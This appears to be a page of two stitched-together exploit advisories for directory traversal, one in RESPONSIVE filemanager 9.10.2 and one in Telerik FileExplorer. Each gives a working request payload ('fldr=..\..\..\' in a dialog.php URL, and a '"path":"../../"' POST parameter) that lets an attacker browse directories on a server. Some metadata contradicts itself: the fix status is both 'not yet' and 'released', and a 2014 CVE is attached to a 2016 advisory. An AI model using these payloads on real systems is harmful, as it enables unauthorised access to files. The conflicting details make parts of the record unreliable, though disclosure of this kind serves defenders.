RESPONSIVE filemanager <= 9.10.2 - Directory Traversal

RESPONSIVE filemanager <= 9.10.2 - Directory Traversal

Advisory: Directory Traversal in RESPONSIVE filemanager on Window Server

During a penetration test discovered a directory traversal vulnerability
in RESPONSIVE filemanager. Attackers are able to read arbitrary directory by specifying a
relative path.

Details
=======

Product: DRESPONSIVE filemanager
Affected Versions: RESPONSIVE filemanager v9.10.2
Fixed Versions: Not yet
Vulnerability Type: Directory Traversal
Vendor URL:
    http://www.responsivefilemanager.com/
Software Link:
    https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip
Vendor Status: fixed version released
Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
Tested on: WINDOW SERVER
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575

Attack Detail
[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\
fldr=..\..\..\

Telerik File Explorer Directory Traversal

# Exploit Title: Telerik FileExplorer Directory Traversal
# Date: 12/11/2014
# Exploit Author: Kerz
# Vendor Homepage: www.telerik.com
# Software Link: http://www.telerik.com/products/aspnet-ajax.aspx
# Version: Q3 2014
# Tested on: Windows OS
# CVE: None

The malicuious user sends a malformed request that generates the file access up directories as follows:

http://target_URL/FileExplorer.aspx
[POST Data]
&__CALLBACKPARAM -> "path":"../../"

Thanks